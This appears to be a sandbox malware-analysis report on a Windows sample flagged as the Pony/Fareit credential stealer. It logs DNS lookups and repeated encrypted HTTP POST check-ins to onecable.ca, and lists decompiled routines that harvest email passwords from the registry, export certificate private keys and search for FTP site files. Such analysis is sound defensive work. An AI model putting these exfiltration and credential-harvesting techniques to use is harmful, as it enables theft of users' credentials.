Jan 3, 2025 03:13:35.911926031 CET	50009	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:35.911963940 CET	50009	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:35.917387962 CET	80	50009	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:35.917876959 CET	50009	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:35.922844887 CET	80	50009	3.33.130.190	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 03:12:00.366153002 CET	61280	53	192.168.2.4	1.1.1.1
Jan 3, 2025 03:12:00.375138998 CET	53	61280	1.1.1.1	192.168.2.4
Jan 3, 2025 03:12:05.391355991 CET	57701	53	192.168.2.4	1.1.1.1
Jan 3, 2025 03:12:05.400317907 CET	53	57701	1.1.1.1	192.168.2.4
Jan 3, 2025 03:12:10.405637026 CET	60604	53	192.168.2.4	1.1.1.1
Jan 3, 2025 03:12:10.415417910 CET	53	60604	1.1.1.1	192.168.2.4
Jan 3, 2025 03:12:15.421294928 CET	56336	53	192.168.2.4	1.1.1.1
Jan 3, 2025 03:12:15.430360079 CET	53	56336	1.1.1.1	192.168.2.4
Jan 3, 2025 03:12:20.447956085 CET	60986	53	192.168.2.4	1.1.1.1
Jan 3, 2025 03:12:20.457366943 CET	53	60986	1.1.1.1	192.168.2.4
Jan 3, 2025 03:12:25.468312979 CET	58575	53	192.168.2.4	1.1.1.1
Jan 3, 2025 03:12:25.498440981 CET	53	58575	1.1.1.1	192.168.2.4
Jan 3, 2025 03:12:30.515392065 CET	59287	53	192.168.2.4	1.1.1.1
Jan 3, 2025 03:12:30.524576902 CET	53	59287	1.1.1.1	192.168.2.4
Jan 3, 2025 03:12:35.530777931 CET	55931	53	192.168.2.4	1.1.1.1
Jan 3, 2025 03:12:35.541213036 CET	53	55931	1.1.1.1	192.168.2.4
Jan 3, 2025 03:12:40.546464920 CET	57275	53	192.168.2.4	1.1.1.1
Jan 3, 2025 03:12:40.556389093 CET	53	57275	1.1.1.1	192.168.2.4
Jan 3, 2025 03:12:45.562024117 CET	64420	53	192.168.2.4	1.1.1.1
Jan 3, 2025 03:12:45.593322039 CET	53	64420	1.1.1.1	192.168.2.4
Jan 3, 2025 03:12:50.609210014 CET	53651	53	192.168.2.4	1.1.1.1
Jan 3, 2025 03:12:50.621644020 CET	53	53651	1.1.1.1	192.168.2.4
Jan 3, 2025 03:12:50.622361898 CET	51729	53	192.168.2.4	1.1.1.1
Jan 3, 2025 03:12:50.632457018 CET	53	51729	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2025 03:12:00.366153002 CET	192.168.2.4	1.1.1.1	0xb29b	Standard query (0)	oliviagurun.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:05.391355991 CET	192.168.2.4	1.1.1.1	0x2d2a	Standard query (0)	oliviagurun.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:10.405637026 CET	192.168.2.4	1.1.1.1	0x4bec	Standard query (0)	oliviagurun.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:15.421294928 CET	192.168.2.4	1.1.1.1	0xe25d	Standard query (0)	oliviagurun.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:20.447956085 CET	192.168.2.4	1.1.1.1	0xda64	Standard query (0)	oliviagurun.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:25.468312979 CET	192.168.2.4	1.1.1.1	0x5a97	Standard query (0)	oliviagurun.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:30.515392065 CET	192.168.2.4	1.1.1.1	0x2bf0	Standard query (0)	oliviagurun.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:35.530777931 CET	192.168.2.4	1.1.1.1	0xb48f	Standard query (0)	oliviagurun.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:40.546464920 CET	192.168.2.4	1.1.1.1	0x50ab	Standard query (0)	oliviagurun.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:45.562024117 CET	192.168.2.4	1.1.1.1	0xe7e0	Standard query (0)	oliviagurun.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:50.609210014 CET	192.168.2.4	1.1.1.1	0xc48e	Standard query (0)	oliviagurun.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:50.622361898 CET	192.168.2.4	1.1.1.1	0xf9df	Standard query (0)	onecable.ca	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 3, 2025 03:12:00.375138998 CET	1.1.1.1	192.168.2.4	0xb29b	Name error (3)	oliviagurun.com	none	none	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:05.400317907 CET	1.1.1.1	192.168.2.4	0x2d2a	Name error (3)	oliviagurun.com	none	none	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:10.415417910 CET	1.1.1.1	192.168.2.4	0x4bec	Name error (3)	oliviagurun.com	none	none	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:15.430360079 CET	1.1.1.1	192.168.2.4	0xe25d	Name error (3)	oliviagurun.com	none	none	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:20.457366943 CET	1.1.1.1	192.168.2.4	0xda64	Name error (3)	oliviagurun.com	none	none	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:25.498440981 CET	1.1.1.1	192.168.2.4	0x5a97	Name error (3)	oliviagurun.com	none	none	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:30.524576902 CET	1.1.1.1	192.168.2.4	0x2bf0	Name error (3)	oliviagurun.com	none	none	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:35.541213036 CET	1.1.1.1	192.168.2.4	0xb48f	Name error (3)	oliviagurun.com	none	none	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:40.556389093 CET	1.1.1.1	192.168.2.4	0x50ab	Name error (3)	oliviagurun.com	none	none	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:45.593322039 CET	1.1.1.1	192.168.2.4	0xe7e0	Name error (3)	oliviagurun.com	none	none	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:50.621644020 CET	1.1.1.1	192.168.2.4	0xc48e	Name error (3)	oliviagurun.com	none	none	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:50.632457018 CET	1.1.1.1	192.168.2.4	0xf9df	No error (0)	onecable.ca		3.33.130.190	A (IP address)	IN (0x0001)	false
Jan 3, 2025 03:12:50.632457018 CET	1.1.1.1	192.168.2.4	0xf9df	No error (0)	onecable.ca		15.197.148.33	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

onecable.ca

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	3.33.130.190	80	7428	C:\Users\user\Desktop\pbfe2Xcxue.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 03:12:50.641019106 CET	398	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: onecable.ca Accept: / Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 183 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Jan 3, 2025 03:12:50.647005081 CET	183	OUT	Data Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&
Jan 3, 2025 03:12:51.126099110 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49754	3.33.130.190	80	7428	C:\Users\user\Desktop\pbfe2Xcxue.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 03:12:56.146125078 CET	398	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: onecable.ca Accept: / Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 183 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Jan 3, 2025 03:12:56.151035070 CET	183	OUT	Data Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&
Jan 3, 2025 03:12:56.628221989 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49788	3.33.130.190	80	7428	C:\Users\user\Desktop\pbfe2Xcxue.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 03:13:01.663772106 CET	398	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: onecable.ca Accept: / Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 183 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Jan 3, 2025 03:13:01.668658972 CET	183	OUT	Data Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&
Jan 3, 2025 03:13:05.065531969 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49842	3.33.130.190	80	7428	C:\Users\user\Desktop\pbfe2Xcxue.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 03:13:10.082688093 CET	398	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: onecable.ca Accept: / Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 183 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Jan 3, 2025 03:13:10.087496996 CET	183	OUT	Data Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&
Jan 3, 2025 03:13:11.483465910 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49885	3.33.130.190	80	7428	C:\Users\user\Desktop\pbfe2Xcxue.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 03:13:16.504730940 CET	398	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: onecable.ca Accept: / Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 183 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Jan 3, 2025 03:13:16.509557009 CET	183	OUT	Data Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&
Jan 3, 2025 03:13:16.987520933 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49923	3.33.130.190	80	7428	C:\Users\user\Desktop\pbfe2Xcxue.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 03:13:22.005090952 CET	398	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: onecable.ca Accept: / Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 183 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Jan 3, 2025 03:13:22.010132074 CET	183	OUT	Data Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&
Jan 3, 2025 03:13:25.425403118 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49973	3.33.130.190	80	7428	C:\Users\user\Desktop\pbfe2Xcxue.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 03:13:30.442671061 CET	398	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: onecable.ca Accept: / Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 183 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Jan 3, 2025 03:13:30.447506905 CET	183	OUT	Data Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&
Jan 3, 2025 03:13:30.896998882 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50009	3.33.130.190	80	7428	C:\Users\user\Desktop\pbfe2Xcxue.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 03:13:35.911963940 CET	398	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: onecable.ca Accept: / Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 183 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Jan 3, 2025 03:13:35.917876959 CET	183	OUT	Data Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&

Target ID:	0
Start time:	21:11:52
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\pbfe2Xcxue.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\pbfe2Xcxue.exe"
Imagebase:	0x400000
File size:	126'464 bytes
MD5 hash:	604B748DCA0419D94B618BEB4C5B4710
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: unknown Rule: pony, Description: Identify Pony, Source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: pony, Description: Identify Pony, Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Fareit, Description: Fareit Payload, Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	29.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	11.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	29

Executed Functions

Function 0040EE6F Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EE82
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EEB6
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F171

Strings

PopServer, xrefs: 0040EF1E
PopAccount, xrefs: 0040EF59
Technology, xrefs: 0040EF03
PopPort, xrefs: 0040EF3E
SmtpPassword, xrefs: 0040EFEF
EmailAddress, xrefs: 0040EEE8
SmtpPort, xrefs: 0040EFB4
PopPassword, xrefs: 0040EF79
SmtpAccount, xrefs: 0040EFCF
SmtpServer, xrefs: 0040EF94

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 1332880857-2111798378
Opcode ID: 48701fc6f7a53f3fc018017c5ffdf1ba83a84274159a28ee573b11ab335abaaf
Instruction ID: 3548df5e5d92ba112170233687271ddab6d06c2e7c627c520b4db7f76654d2b1
Opcode Fuzzy Hash: 48701fc6f7a53f3fc018017c5ffdf1ba83a84274159a28ee573b11ab335abaaf
Instruction Fuzzy Hash: C871883181011DAADF226F51CC02BDD7AB6BF44704F14C4BAB598740B1DE7A5AA1EF88

Function 0040D67C Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertOpenSystemStoreA.CRYPT32(00000000,00416216), ref: 0040D702
CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D71B
lstrcmpA.KERNEL32(?,2.5.29.37), ref: 0040D74C

Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919

lstrcmpA.KERNEL32(?,00416223,00000000,?,00000000,00000000,?,2.5.29.37), ref: 0040D784
CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D7A0
CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D7B8
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D7D1
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D7F6
CryptDestroyKey.ADVAPI32(?), ref: 0040D834
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D83F
CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D867

Strings

2.5.29.37, xrefs: 0040D745

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
String ID: 2.5.29.37
API String ID: 2649496969-3842544949
Opcode ID: e5cc720597dd0b0bfed270f8281436db206444160b3c3517c161f6a20745e8b7
Instruction ID: d2a6f2ac97224c0d901a019ef032b959bd315932c7f56dbf06825e9e5b2bb0c7
Opcode Fuzzy Hash: e5cc720597dd0b0bfed270f8281436db206444160b3c3517c161f6a20745e8b7
Instruction Fuzzy Hash: 7E511732D00205EBDF22ABA1DC0AFEEBB71EB44705F148436E221B51F0D7795994DB58

Function 00405108 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00405178
lstrcmpiA.KERNEL32(00414900,?), ref: 004051A1
lstrcmpiA.KERNEL32(00414902,?), ref: 004051BE
FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 0040526D
FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 00405280

Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C

Strings

*.*, xrefs: 00405147
\*.*, xrefs: 00405138
Sites\, xrefs: 0040523B
.ini, xrefs: 00405206

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$.ini$Sites\$\*.*
API String ID: 3040542784-999409347
Opcode ID: d4198b782cc50647568fc352e49b3827d11038156717d300b2a354d5adf5e24d
Instruction ID: 92fea1592d8d9cebbb1ab59b3cffad2d04c4a45fac070dd432891a232b779cce
Opcode Fuzzy Hash: d4198b782cc50647568fc352e49b3827d11038156717d300b2a354d5adf5e24d
Instruction Fuzzy Hash: A2314FB1900609AADF11AB61CC06BEF7768EF50308F1481BBB91CB91E1D77D8ED19E58

Function 0040487D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExA.KERNEL32(0000009C), ref: 004048C6
GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 0040494B
GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404974
GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404A29
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404A48
GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404A58
GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404A66

Strings

HWID, xrefs: 004049A2
kernel32.dll, xrefs: 00404A24
GetNativeSystemInfo, xrefs: 00404A3D

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
String ID: GetNativeSystemInfo$HWID$kernel32.dll
API String ID: 1787888500-92997708
Opcode ID: 6fbdeea1c4f244062ac394409f982e4d2bc40400ca5b27b4f38d13cd6d30d012
Instruction ID: 7dbe06de0323f137e8a3642c202c803697ee0d295fd11c1b643691ea5f2f9791
Opcode Fuzzy Hash: 6fbdeea1c4f244062ac394409f982e4d2bc40400ca5b27b4f38d13cd6d30d012
Instruction Fuzzy Hash: 205144B1A40218BEDF217B61CC02F9D7A35AF81344F1480BBB649790E1DBB95BD09F59

Function 00408DAD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00408E02
lstrcmpiA.KERNEL32(00414900,?), ref: 00408E35
lstrcmpiA.KERNEL32(00414902,?), ref: 00408E4F
